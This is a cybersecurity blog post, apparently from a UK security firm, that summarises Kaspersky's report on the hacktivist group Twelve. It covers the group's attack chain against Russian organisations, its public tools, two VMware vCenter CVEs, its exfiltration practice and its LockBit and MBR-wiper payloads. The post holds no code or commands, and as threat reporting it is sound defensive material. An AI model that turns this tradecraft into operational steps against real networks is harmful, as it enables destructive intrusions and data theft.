Blog Details

  • Home
  • Blog
  • Hacktivist Group Twelve Targets Russian Entities with Destructive Cyber Attacks
Hacktivist Group Twelve Targets Russian Entities with Destructive Cyber Attacks

Hacktivist Group Twelve Targets Russian Entities with Destructive Cyber Attacks

A hacktivist group known as Twelve has been observed executing destructive cyber attacks against Russian targets using an arsenal of publicly available tools, according to a recent analysis by cybersecurity firm Kaspersky.

Unlike ransomware groups that demand payment to decrypt data, Twelve takes a more destructive approach. "Rather than demand a ransom for decrypting data, Twelve prefers to encrypt victims' data and then destroy their infrastructure with a wiper to prevent recovery," Kaspersky reported on Friday. "The approach is indicative of a desire to cause maximum damage to target organizations without deriving direct financial benefit."

Formed in April 2023, likely in response to the ongoing Russo-Ukrainian war, Twelve has consistently launched attacks designed to cripple networks and disrupt business operations. In addition to its destructive capabilities, the group also engages in hack-and-leak operations, exfiltrating sensitive data and sharing it on its Telegram channel.

Kaspersky’s analysis revealed that Twelve shares similarities with DARKSTAR, a ransomware group also known as COMET or Shadow, suggesting that the two groups might be related or part of the same operational cluster. "While Twelve's actions are clearly hacktivist, DARKSTAR follows the traditional double extortion model," Kaspersky noted, highlighting the complexity of modern cyberthreats.

Attack Tactics

Twelve’s attack chains often begin with the exploitation of valid local or domain accounts, followed by the use of Remote Desktop Protocol (RDP) for lateral movement. Some attacks are carried out by first gaining access to contractors' systems and using their certificates to connect to a customer's virtual private network (VPN).

Prominent among the tools in Twelve’s arsenal are:

  • Cobalt Strike
  • Mimikatz
  • Chisel
  • BloodHound
  • PowerView
  • CrackMapExec
  • Advanced IP Scanner
  • PsExec

These tools are used for credential theft, network discovery, privilege escalation, and mapping. In many cases, malicious RDP connections are tunneled through ngrok.

Additionally, Twelve deploys PHP web shells like WSO, which allow the execution of arbitrary commands, file transfers, and email sending. These web shells are publicly accessible on platforms like GitHub.

Notable Attack Instances

In one high-profile incident, the group exploited known vulnerabilities in VMware vCenter (CVE-2021-21972 and CVE-2021-22005) to install a web shell, which was then used to deliver a backdoor dubbed FaceFish.

The attackers also used PowerShell to manipulate Access Control Lists (ACLs) for Active Directory objects, adding domain users and groups. To evade detection, they disguised their malware using names like "Update Microsoft," "Yandex," and "intel.exe."

Twelve’s attacks are further characterized by the use of a PowerShell script (“Sophos_kill_local.ps1”) to disable Sophos security software on compromised hosts.

The final stages of Twelve’s attacks involve launching ransomware and wiper payloads via Windows Task Scheduler. Before these destructive measures, the group exfiltrates sensitive information, compressing it into ZIP archives and uploading them to a file-sharing service called DropMeFiles.

The ransomware used is a version of LockBit 3.0, compiled from publicly available source code, which terminates processes that might interfere with encryption. Meanwhile, the wiper malware, similar to Shamoon, rewrites the master boot record (MBR) on connected drives, irreversibly overwriting file contents with random data.

Kaspersky's findings underscore that Twelve relies heavily on publicly available tools rather than creating custom malware. "This makes it possible to detect and prevent Twelve's attacks in due time," the company noted, urging organizations to remain vigilant against such threats.

© 2016 - 2025 Red Secure Tech Ltd. Registered in England and Wales under Company Number: 15581067